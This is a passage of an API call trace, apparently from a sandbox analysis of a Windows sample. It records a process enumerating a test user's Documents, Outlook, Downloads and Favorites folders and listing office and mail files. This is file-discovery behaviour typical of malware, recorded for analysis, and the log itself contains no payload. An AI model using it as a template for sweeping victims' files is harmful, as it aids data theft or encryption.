ftCreationTime.dwLowDateTime=0x1461a5c0, ftCreationTime.dwHighDateTime=0x1d5d7d4, ftLastAccessTime.dwLowDateTime=0x36151460, ftLastAccessTime.dwHighDateTime=0x1d5d81d, ftLastWriteTime.dwLowDateTime=0x36151460, ftLastWriteTime.dwHighDateTime=0x1d5d81d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.638] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ec298 | out: lpFindFileData=0x4ec298*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1461a5c0, ftCreationTime.dwHighDateTime=0x1d5d7d4, ftLastAccessTime.dwLowDateTime=0x36151460, ftLastAccessTime.dwHighDateTime=0x1d5d81d, ftLastWriteTime.dwLowDateTime=0x36151460, ftLastWriteTime.dwHighDateTime=0x1d5d81d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.638] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.638] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ec298 | out: lpFindFileData=0x4ec298*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9db3e240, ftCreationTime.dwHighDateTime=0x1d5e08d, ftLastAccessTime.dwLowDateTime=0xbca25a20, ftLastAccessTime.dwHighDateTime=0x1d5d9a7, ftLastWriteTime.dwLowDateTime=0xbca25a20, ftLastWriteTime.dwHighDateTime=0x1d5d9a7, nFileSizeHigh=0x0, nFileSizeLow=0x1377c, dwReserved0=0x0, dwReserved1=0x0, cFileName="4kSrTtlrIRRlrfGzezvH.doc", cAlternateFileName="4KSRTT~1.DOC")) returned 1 [0070.638] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.638] lstrlenW (lpString="4kSrTtlrIRRlrfGzezvH.doc") returned 24 [0070.639] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\8qeG7y5KAsyJMs\\nHQQE_Fn3tp7lUVJdM\\*", lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dd81820, ftCreationTime.dwHighDateTime=0x1d5d9c7, ftLastAccessTime.dwLowDateTime=0x4fec28d0, ftLastAccessTime.dwHighDateTime=0x1d5d7e4, ftLastWriteTime.dwLowDateTime=0x4fec28d0, ftLastWriteTime.dwHighDateTime=0x1d5d7e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7b38 [0070.639] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5dd81820, ftCreationTime.dwHighDateTime=0x1d5d9c7, ftLastAccessTime.dwLowDateTime=0x4fec28d0, ftLastAccessTime.dwHighDateTime=0x1d5d7e4, ftLastWriteTime.dwLowDateTime=0x4fec28d0, ftLastWriteTime.dwHighDateTime=0x1d5d7e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.639] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.639] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4ef770 | out: lpFindFileData=0x4ef770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x43c47c30, ftCreationTime.dwHighDateTime=0x1d5e1dd, ftLastAccessTime.dwLowDateTime=0x3423230, ftLastAccessTime.dwHighDateTime=0x1d5e154, ftLastWriteTime.dwLowDateTime=0x3423230, ftLastWriteTime.dwHighDateTime=0x1d5e154, nFileSizeHigh=0x0, nFileSizeLow=0x80cd, dwReserved0=0x0, dwReserved1=0x0, cFileName="4AaNf2aygyQ.csv", cAlternateFileName="4AANF2~1.CSV")) returned 1 [0070.639] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.639] lstrlenW (lpString="4AaNf2aygyQ.csv") returned 15 [0070.639] FindClose (in: hFindFile=0x4d7b38 | out: hFindFile=0x4d7b38) returned 1 [0070.639] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef770 | out: hHeap=0x4a0000) returned 1 [0070.639] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ec298 | out: lpFindFileData=0x4ec298*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62f41d30, ftCreationTime.dwHighDateTime=0x1d5e6a7, ftLastAccessTime.dwLowDateTime=0xa15ef970, ftLastAccessTime.dwHighDateTime=0x1d5d8f9, ftLastWriteTime.dwLowDateTime=0xa15ef970, ftLastWriteTime.dwHighDateTime=0x1d5d8f9, nFileSizeHigh=0x0, nFileSizeLow=0x84e9, dwReserved0=0x0, dwReserved1=0x0, cFileName="oPkx.rtf", cAlternateFileName="")) returned 1 [0070.639] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.640] lstrlenW (lpString="oPkx.rtf") returned 8 [0070.640] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.640] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec298 | out: hHeap=0x4a0000) returned 1 [0070.640] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c697a60, ftCreationTime.dwHighDateTime=0x1d5ccb0, ftLastAccessTime.dwLowDateTime=0xdaa5b130, ftLastAccessTime.dwHighDateTime=0x1d56872, ftLastWriteTime.dwLowDateTime=0xdaa5b130, ftLastWriteTime.dwHighDateTime=0x1d56872, nFileSizeHigh=0x0, nFileSizeLow=0xd1e2, dwReserved0=0x662f672f, dwReserved1=0x5136316d, cFileName="8QO5Aut6rZ.docx", cAlternateFileName="8QO5AU~1.DOC")) returned 1 [0070.640] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.640] lstrlenW (lpString="8QO5Aut6rZ.docx") returned 15 [0070.640] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x4ec458 | out: lpFindFileData=0x4ec458*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4f3f30, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ǖ?ǕꝻ")) returned 0xffffffff [0070.640] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec458 | out: hHeap=0x4a0000) returned 1 [0070.640] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0070.640] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.640] lstrlenW (lpString="My Pictures") returned 11 [0070.641] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x4ec458 | out: lpFindFileData=0x4ec458*(dwFileAttributes=0x4ef770, ftCreationTime.dwLowDateTime=0x4f3f30, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="Ǖ?ǕꝻ")) returned 0xffffffff [0070.641] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec458 | out: hHeap=0x4a0000) returned 1 [0070.641] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="My Shapes", cAlternateFileName="MYSHAP~1")) returned 1 [0070.641] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.641] lstrlenW (lpString="My Shapes") returned 9 [0070.641] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x4ec458 | out: lpFindFileData=0x4ec458*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.644] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ec458 | out: lpFindFileData=0x4ec458*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.644] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.645] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ec458 | out: lpFindFileData=0x4ec458*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.645] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.645] lstrlenW (lpString="desktop.ini") returned 11 [0070.645] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\_private\\*", lpFindFileData=0x4f0778 | out: lpFindFileData=0x4f0778*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7b38 [0070.680] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4f0778 | out: lpFindFileData=0x4f0778*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.680] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.680] FindNextFileW (in: hFindFile=0x4d7b38, lpFindFileData=0x4f0778 | out: lpFindFileData=0x4f0778*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x74e6, dwReserved0=0x0, dwReserved1=0x0, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0070.680] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.680] lstrlenW (lpString="folder.ico") returned 10 [0070.680] FindClose (in: hFindFile=0x4d7b38 | out: hFindFile=0x4d7b38) returned 1 [0070.680] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f0778 | out: hHeap=0x4a0000) returned 1 [0070.681] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ec458 | out: lpFindFileData=0x4ec458*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0070.681] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.681] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec458 | out: hHeap=0x4a0000) returned 1 [0070.681] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x290dda00, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x290dda00, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x290dda00, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0070.681] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.681] lstrlenW (lpString="My Videos") returned 9 [0070.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*", lpFindFileData=0x4ec458 | out: lpFindFileData=0x4ec458*(dwFileAttributes=0x4ed100, ftCreationTime.dwLowDateTime=0x4dd498, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0xffffffff [0070.681] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec458 | out: hHeap=0x4a0000) returned 1 [0070.681] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd8832810, ftCreationTime.dwHighDateTime=0x1d58389, ftLastAccessTime.dwLowDateTime=0xf9621670, ftLastAccessTime.dwHighDateTime=0x1d56aa9, ftLastWriteTime.dwLowDateTime=0xf9621670, ftLastWriteTime.dwHighDateTime=0x1d56aa9, nFileSizeHigh=0x0, nFileSizeLow=0xf72f, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="oKCfH7.pptx", cAlternateFileName="OKCFH7~1.PPT")) returned 1 [0070.681] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.681] lstrlenW (lpString="oKCfH7.pptx") returned 11 [0070.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*", lpFindFileData=0x4ec458 | out: lpFindFileData=0x4ec458*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.682] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ec458 | out: lpFindFileData=0x4ec458*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x8a4af3c0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0x8a4af3c0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.682] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.682] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ec458 | out: lpFindFileData=0x4ec458*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5a868660, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5a868660, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x8a4fb680, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="voeimd@djhreuu.uhd.pst", cAlternateFileName="VOEIMD~1.PST")) returned 1 [0070.682] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.682] lstrlenW (lpString="voeimd@djhreuu.uhd.pst") returned 22 [0070.682] FindClose (in: hFindFile=0x4d7af8 | out: hFindFile=0x4d7af8) returned 1 [0070.682] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ec458 | out: hHeap=0x4a0000) returned 1 [0070.682] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35d43b00, ftCreationTime.dwHighDateTime=0x1d5805e, ftLastAccessTime.dwLowDateTime=0x265f06d0, ftLastAccessTime.dwHighDateTime=0x1d58dd5, ftLastWriteTime.dwLowDateTime=0x265f06d0, ftLastWriteTime.dwHighDateTime=0x1d58dd5, nFileSizeHigh=0x0, nFileSizeLow=0x143c1, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="PgChU9H2N19O0juNS3v.xlsx", cAlternateFileName="PGCHU9~1.XLS")) returned 1 [0070.682] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.682] lstrlenW (lpString="PgChU9H2N19O0juNS3v.xlsx") returned 24 [0070.682] FindClose (in: hFindFile=0x4d7ab8 | out: hFindFile=0x4d7ab8) returned 1 [0070.682] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.682] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0070.682] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.682] lstrlenW (lpString="Downloads") returned 9 [0070.682] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*", lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName=".", cAlternateFileName="")) returned 0x4d7ab8 [0070.683] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="..", cAlternateFileName="")) returned 1 [0070.683] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.683] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.683] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.683] lstrlenW (lpString="desktop.ini") returned 11 [0070.683] FindClose (in: hFindFile=0x4d7ab8 | out: hFindFile=0x4d7ab8) returned 1 [0070.683] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d9400 | out: hHeap=0x4a0000) returned 1 [0070.683] FindNextFileW (in: hFindFile=0x4e1698, lpFindFileData=0x4d91a8 | out: lpFindFileData=0x4d91a8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x730055, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0070.683] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.683] lstrlenW (lpString="Favorites") returned 9 [0070.683] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\*", lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName=".", cAlternateFileName="")) returned 0x4d7ab8 [0070.683] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="..", cAlternateFileName="")) returned 1 [0070.683] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.683] FindNextFileW (in: hFindFile=0x4d7ab8, lpFindFileData=0x4d9400 | out: lpFindFileData=0x4d9400*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x192, dwReserved0=0xa0000003, dwReserved1=0x5136316d, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.683] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.684] lstrlenW (lpString="desktop.ini") returned 11 [0070.684] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Links\\*", lpFindFileData=0x4ed100 | out: lpFindFileData=0x4ed100*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4d7af8 [0070.684] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ed100 | out: lpFindFileData=0x4ed100*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x52cd1930, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0070.684] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.684] FindNextFileW (in: hFindFile=0x4d7af8, lpFindFileData=0x4ed100 | out: lpFindFileData=0x4ed100*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xbae0ad90, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x50, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0070.684] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0070.684] lstrlenW 